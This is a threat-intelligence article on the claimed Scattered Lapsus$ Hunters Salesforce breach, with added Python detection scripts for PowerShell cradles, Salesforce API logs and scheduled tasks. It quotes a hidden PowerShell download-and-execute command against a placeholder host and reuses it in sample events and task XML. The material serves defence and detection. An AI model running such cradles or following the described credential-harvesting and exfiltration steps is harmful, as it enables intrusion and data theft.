Scattered Lapsus$ Hunters Claim to Have Stolen Over 1 Billion Salesforce Records

In a significant escalation of cybercriminal activity, the group calling itself Scattered Lapsus$ Hunters claims to have exfiltrated more than one billion records from Salesforce environments worldwide. The collective, which draws on members associated with ShinyHunters, Scattered Spider, and Lapsus$, has been linked to a series of high-profile data breaches throughout 2025.

Emergence and Tactics

Emerging in mid-2025, Scattered Lapsus$ Hunters have built their tradecraft around weaknesses in cloud identity and exposed APIs rather than around defects in the platforms themselves. Their operations have predominantly targeted Salesforce, a leading customer relationship management (CRM) platform, underscoring that the security of a cloud service rests heavily on which identities and integrations are allowed to reach its API.

Initial Indicators and Investigation

The breach came to light when several Salesforce customers noticed unusual query activity in their CRM instances outside business hours. The volume and regularity of the requests pointed to automated extraction tooling rather than interactive use. Subsequent forensic analysis showed that the amount of data accessed was unprecedented, indicating a well-coordinated and carefully planned operation.

Attack Methodology

The attackers combined targeted phishing with credential stuffing to gain initial access. Victims received emails that appeared legitimate and instructed them to apply a mandatory security update. The attached Office documents carried malicious macros which, when enabled, contacted remote command-and-control servers and installed lightweight loaders. Since current Office builds block macros in documents carrying the Mark of the Web by default, this delivery path depends on the victim being talked into unblocking the file or on the mark being absent.

Security researchers noted that the loaders were written in Go and built with stripped symbols, which removes function names from the binary and slows reverse engineering. Once running, a loader validated the API tokens it had obtained and started a multi-stage harvesting routine that systematically extracted large volumes of sensitive data.

Impact and Implications

The ramifications of this breach extend beyond the exposure of personal data. Proprietary sales strategies, pipeline forecasts, and confidential client negotiations have been compromised. Given that many organizations rely heavily on Salesforce for mission-critical operations, such a compromise can lead to significant operational disruptions and reputational damage.

Early estimates suggest that the group may have extracted data at a sustained rate exceeding 500 gigabytes per hour, transmitting records in encrypted batches to evade detection.

Technical Details of the Infection Mechanism

A closer examination of the infection mechanism reveals a strategic emphasis on stealth and persistence. After the initial macro dropper executes, a PowerShell script stager is launched through a command such as:

```powershell
powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {IEX ((New-Object Net.WebClient).DownloadString('https://cdn.example.com/stager.ps1'))}"
```
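A command line like the one above is exactly what process-creation telemetry records, so that is where it can be caught. The following is an added example, not code from the original article or from any vendor: it scores constructed Sysmon-style events for the download-cradle combination (remote fetch plus in-memory evaluation, hidden window, policy bypass, an Office parent process) and decodes `-EncodedCommand` payloads so the same rules apply to the obfuscated variant. The field names `Image`, `ParentImage` and `CommandLine`, the sample events and the scoring rule are assumptions to adapt to your own SIEM schema.

```python
"""Flag PowerShell download cradles in process-creation telemetry.

Added example for this article, not tooling from the original report. The
events below are constructed to resemble Sysmon Event ID 1 / Windows 4688
records; the field names are an assumption, adapt them to your SIEM schema.
"""
import base64
import re

# Signals of a stager: hidden, non-interactive PowerShell that fetches remote
# script and evaluates it in memory. Patterns are deliberately loose so the
# short aliases loaders favour (-nop, -w h, -ep) are covered too.
CRADLE_PATTERNS = {
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|"
        r"\bcurl\b|net\.webclient|invoke-restmethod|\birm\b", re.I),
    "hidden": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "bypass": re.compile(r"-e(xec(utionpolicy)?|p)?\s+bypass", re.I),
    "noprofile": re.compile(r"-nop(rofile)?\b", re.I),
}
# -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def build_encoded_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if absent or invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: dict) -> dict:
    """Score one process-creation event; returns matched signals and a verdict."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return {"hits": [], "suspicious": False, "decoded": ""}
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = f"{cmd} {decoded}"                      # scan the decoded script too
    hits = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(text)]
    if decoded:
        hits.append("encoded")
    if event.get("ParentImage", "").lower().endswith(OFFICE_PARENTS):
        hits.append("office_parent")
    # Fetch-and-evaluate is the cradle itself, and Office spawning PowerShell
    # is worth a look on its own. The flags alone (hidden, bypass, noprofile)
    # are too common in admin scripts to alert on by themselves.
    suspicious = ("download" in hits and "iex" in hits) or "office_parent" in hits
    return {"hits": hits, "suspicious": suspicious, "decoded": decoded}


def find_cradles(events: list) -> list:
    """Return (index, hits) for every event that scores as suspicious."""
    out = []
    for i, event in enumerate(events):
        result = score_event(event)
        if result["suspicious"]:
            out.append((i, result["hits"]))
    return out


# Constructed sample telemetry, not real events. Event 0 is the stager
# command quoted in the article launched from Word; event 1 is the same
# cradle hidden behind -EncodedCommand; event 2 is routine admin use.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
                    "-Command \"& {IEX ((New-Object Net.WebClient)"
                    ".DownloadString('https://cdn.example.com/stager.ps1'))}\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + build_encoded_command(
         "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.com/s.ps1')")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]

if __name__ == "__main__":
    for idx, hits in find_cradles(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Run it as-is and events 0 and 1 are reported; event 2 only trips the `noprofile` signal and is left alone. The point of decoding `-EncodedCommand` before matching is that a rule keyed on the literal string `DownloadString` never sees it in the encoded form.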

This stager checks for sandbox indicators before retrieving the full Go-based loader. The loader then reads saved credentials from the Windows Credential Manager through the `CredRead` API (the operating system hands back the secret already decrypted for the calling user, so no key recovery is involved) and authenticates to the Salesforce REST API with the least-privileged stored account that can still read the target objects, which keeps the resulting API activity close to that account's normal profile.

Once authenticated, the malware enumerates the org's object schemas (the sObject list and per-object field descriptions) and builds SOQL queries from them to pull records in batches. Each batch is buffered in memory and encrypted with ChaCha20 before being sent over HTTPS to a dedicated exfiltration endpoint. The extra encryption adds nothing against a passive network observer, who already sees only TLS; its purpose is to defeat content inspection at a TLS-terminating proxy or DLP gateway.
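Both the off-hours anomaly described under Initial Indicators and the schema enumeration followed by batched SOQL pulls described here leave a footprint in Salesforce Event Monitoring. The example below is added here and is neither the article's nor Salesforce's code: it profiles a constructed API event-log extract per user and flags the combination of a describe call, many distinct objects, repeated fixed-size pages, high row volume and off-hours timing. The column subset, the user IDs, the sample rows and every threshold are assumptions to tune for your org.

```python
"""Hunt Salesforce API event logs for schema-wide, automated, off-hours pulls.

Added example for this article; not Salesforce tooling and not the group's
code. The CSV below is constructed. Its columns are a simplified subset of
the Event Monitoring API event log (EVENT_TYPE, TIMESTAMP_DERIVED, USER_ID,
CLIENT_IP, ENTITY_NAME, ROWS_PROCESSED, URI); treat the column set, the IDs
and every threshold as assumptions.
"""
import csv
import io
import re
from collections import defaultdict
from datetime import datetime, timezone

BUSINESS_HOURS = range(7, 19)      # 07:00-18:59 in the org's time zone (UTC here)
ROWS_THRESHOLD = 5_000             # rows per user in the window
OBJECT_THRESHOLD = 4               # distinct objects per user in the window
FIXED_PAGE_MIN = 1_000             # page size that suggests scripted paging
FIXED_PAGE_REPEATS = 3
ENUM_URI = re.compile(r"/services/data/v[\d.]+/sobjects/?$")   # describeGlobal

# Constructed sample: one user listing every sObject at 02:03 and then paging
# six objects at the 2000-row REST maximum; one user doing ordinary daytime work.
SAMPLE_LOG = """\
EVENT_TYPE,TIMESTAMP_DERIVED,USER_ID,CLIENT_IP,ENTITY_NAME,ROWS_PROCESSED,URI
API,2025-09-14T02:03:11.000Z,005xx000001AAA1,203.0.113.7,,0,/services/data/v60.0/sobjects
API,2025-09-14T02:03:12.000Z,005xx000001AAA1,203.0.113.7,Account,2000,/services/data/v60.0/query
API,2025-09-14T02:03:14.000Z,005xx000001AAA1,203.0.113.7,Account,2000,/services/data/v60.0/query/01gxx0000001
API,2025-09-14T02:03:17.000Z,005xx000001AAA1,203.0.113.7,Contact,2000,/services/data/v60.0/query
API,2025-09-14T02:03:20.000Z,005xx000001AAA1,203.0.113.7,Opportunity,2000,/services/data/v60.0/query
API,2025-09-14T02:03:23.000Z,005xx000001AAA1,203.0.113.7,Lead,2000,/services/data/v60.0/query
API,2025-09-14T02:03:26.000Z,005xx000001AAA1,203.0.113.7,Case,2000,/services/data/v60.0/query
API,2025-09-14T02:03:29.000Z,005xx000001AAA1,203.0.113.7,User,500,/services/data/v60.0/query
API,2025-09-14T14:10:02.000Z,005xx000002BBB2,198.51.100.23,Account,37,/services/data/v60.0/query
API,2025-09-14T14:12:45.000Z,005xx000002BBB2,198.51.100.23,Contact,12,/services/data/v60.0/query
"""


def parse_log(text):
    """Parse the CSV export into dicts with a tz-aware timestamp and int row count."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        r["ts"] = (datetime.strptime(r["TIMESTAMP_DERIVED"], "%Y-%m-%dT%H:%M:%S.%fZ")
                   .replace(tzinfo=timezone.utc))
        r["rows"] = int(r["ROWS_PROCESSED"] or 0)
        rows.append(r)
    return rows


def profile_users(rows):
    """Aggregate per-user behaviour over the whole window."""
    per_user = defaultdict(lambda: {"rows": 0, "objects": set(), "ips": set(),
                                    "enumerated": False, "off_hours": 0,
                                    "page_sizes": []})
    for r in rows:
        p = per_user[r["USER_ID"]]
        p["rows"] += r["rows"]
        p["ips"].add(r["CLIENT_IP"])
        if r["ENTITY_NAME"]:
            p["objects"].add(r["ENTITY_NAME"])
        if ENUM_URI.search(r["URI"]):
            p["enumerated"] = True          # listed every sObject in the org
        if r["ts"].hour not in BUSINESS_HOURS:
            p["off_hours"] += 1
        if r["rows"] > 0:
            p["page_sizes"].append(r["rows"])
    return per_user


def findings(per_user, min_signals=3):
    """Return {user_id: [reasons]} for users matching at least min_signals signals."""
    out = {}
    for user, p in per_user.items():
        reasons = []
        if p["rows"] >= ROWS_THRESHOLD:
            reasons.append(f"volume={p['rows']}")
        if len(p["objects"]) >= OBJECT_THRESHOLD:
            reasons.append(f"breadth={len(p['objects'])}")
        if p["enumerated"]:
            reasons.append("schema_enumeration")
        if p["off_hours"]:
            reasons.append(f"off_hours_calls={p['off_hours']}")
        # Scripts pull fixed-size pages (2000 is the REST query maximum); people
        # and reports rarely return the same row count several times in a row.
        if p["page_sizes"]:
            common = max(set(p["page_sizes"]), key=p["page_sizes"].count)
            if common >= FIXED_PAGE_MIN and p["page_sizes"].count(common) >= FIXED_PAGE_REPEATS:
                reasons.append(f"fixed_page_size={common}")
        if len(reasons) >= min_signals:
            out[user] = reasons
    return out


def hunt(text, min_signals=3):
    """Convenience wrapper: CSV text in, {user_id: [reasons]} out."""
    return findings(profile_users(parse_log(text)), min_signals)


if __name__ == "__main__":
    for user, reasons in hunt(SAMPLE_LOG).items():
        print(user, "->", ", ".join(reasons))
```

Requiring several independent signals before alerting is deliberate: a nightly integration user legitimately pulls large volumes off-hours, but it rarely starts by listing every object in the org and then walking each one. Feed the real extract from the `EventLogFile` object into `hunt()` and adjust `BUSINESS_HOURS` to the org's time zone.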

To ensure persistence, the malware registers a scheduled task named `UpdaterSvc` that fires every two hours. The task checks that the loader binary is present, re-downloads it if it has been altered or removed, and resumes extraction from the last successfully retrieved record ID, so an interrupted run continues where it stopped rather than starting over.
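A task like `UpdaterSvc` is visible in its exported definition, which is where a hunt should look rather than at the task name. The following added example (not from the article) parses constructed Task Scheduler XML of the kind `schtasks /query /xml /tn <name>` prints, and flags hidden tasks, short repetition intervals, executables in user-writable paths and PowerShell cradles in the action. The sample tasks, the path heuristics and the four-hour interval threshold are assumptions.

```python
"""Hunt exported Windows scheduled tasks for loader-style persistence.

Added example for this article, not code from the original report. The task
definitions below are constructed XML in the Task Scheduler schema; on a real
host the same XML comes from `schtasks /query /xml /tn <name>` or the files
under C:\Windows\System32\Tasks (those carry an XML declaration and are
UTF-16; pass them to ET.fromstring as bytes). Thresholds and the path
heuristics are assumptions to tune for your estate.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
MAX_BENIGN_INTERVAL = 4 * 3600           # repetition faster than this is a signal
USER_WRITABLE = re.compile(
    r"(\\users\\[^\\]+\\appdata\\|\\users\\public\\|\\programdata\\|"
    r"\\windows\\temp\\|%(?:temp|tmp|appdata|localappdata)%)", re.I)
CRADLE = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|-enc(odedcommand)?\b|"
    r"-e\s+[A-Za-z0-9+/=]{16,})", re.I)
ISO_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def duration_seconds(value):
    """Convert an ISO 8601 duration such as PT2H or P1DT30M to seconds (None if unparsable)."""
    m = ISO_DURATION.match(value or "")
    if not m:
        return None
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def assess_task(name, xml_text):
    """Return the list of persistence signals found in one task definition."""
    root = ET.fromstring(xml_text.strip())
    reasons = []
    if root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS).lower() == "true":
        reasons.append("hidden")
    intervals = [duration_seconds(e.text) for e in root.findall(".//t:Repetition/t:Interval", NS)]
    intervals = [i for i in intervals if i is not None]
    if intervals and min(intervals) <= MAX_BENIGN_INTERVAL:
        reasons.append(f"repeats_every={min(intervals)}s")
    for exe in root.findall(".//t:Actions/t:Exec", NS):
        command = exe.findtext("t:Command", default="", namespaces=NS)
        args = exe.findtext("t:Arguments", default="", namespaces=NS)
        if USER_WRITABLE.search(command):
            reasons.append(f"user_writable_path={command}")
        if CRADLE.search(f"{command} {args}"):
            reasons.append("powershell_cradle")
    return reasons


def is_suspicious(reasons):
    """A binary in a user-writable path or a cradle in the action is decisive;
    hidden and frequent tasks are common in a stock Windows install."""
    return any(r.startswith(("user_writable_path", "powershell_cradle")) for r in reasons)


def hunt(tasks):
    """tasks: {task name: xml text}. Returns {name: reasons} for suspicious tasks."""
    assessed = {name: assess_task(name, xml) for name, xml in tasks.items()}
    return {name: rs for name, rs in assessed.items() if is_suspicious(rs)}


# Constructed task definitions (XML declaration omitted so they parse as str).
SAMPLE_TASKS = {
    # The article's UpdaterSvc: hidden, every two hours, binary in a public dir.
    "UpdaterSvc": r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger>
    <Repetition><Interval>PT2H</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2025-09-01T00:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>C:\Users\Public\Libraries\updater.exe</Command>
    <Arguments>--verify --resume</Arguments>
  </Exec></Actions>
</Task>""",
    # Same cradle as the stager, re-launched at every logon.
    "OfficeTelemetryAgent": r"""
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Repetition><Interval>PT30M</Interval></Repetition></LogonTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.com/stager.ps1')"</Arguments>
  </Exec></Actions>
</Task>""",
    # A stock Windows task for contrast.
    r"Microsoft\Windows\Defrag\ScheduledDefrag": r"""
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger>
    <StartBoundary>2025-09-03T01:00:00</StartBoundary>
    <ScheduleByWeek><DaysOfWeek><Wednesday/></DaysOfWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek>
  </CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>%windir%\system32\defrag.exe</Command>
    <Arguments>-c -h -o -$</Arguments>
  </Exec></Actions>
</Task>""",
}

if __name__ == "__main__":
    for name, reasons in hunt(SAMPLE_TASKS).items():
        print(name, "->", ", ".join(reasons))
```

The task name is the weakest signal of all, since an attacker picks it to look like a system component; what gives the `UpdaterSvc` task away is a hidden, two-hourly trigger whose action lives under `C:\Users\Public`.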

Conclusion

The care Scattered Lapsus$ Hunters take over credential harvesting, over keeping extraction within API limits and the usage profile of the accounts they abuse, and over persistence reflects a mature understanding of cloud-native environments. By combining social engineering, custom tooling, and resilient persistence, they have demonstrated the capability to compromise enterprise Salesforce instances at scale.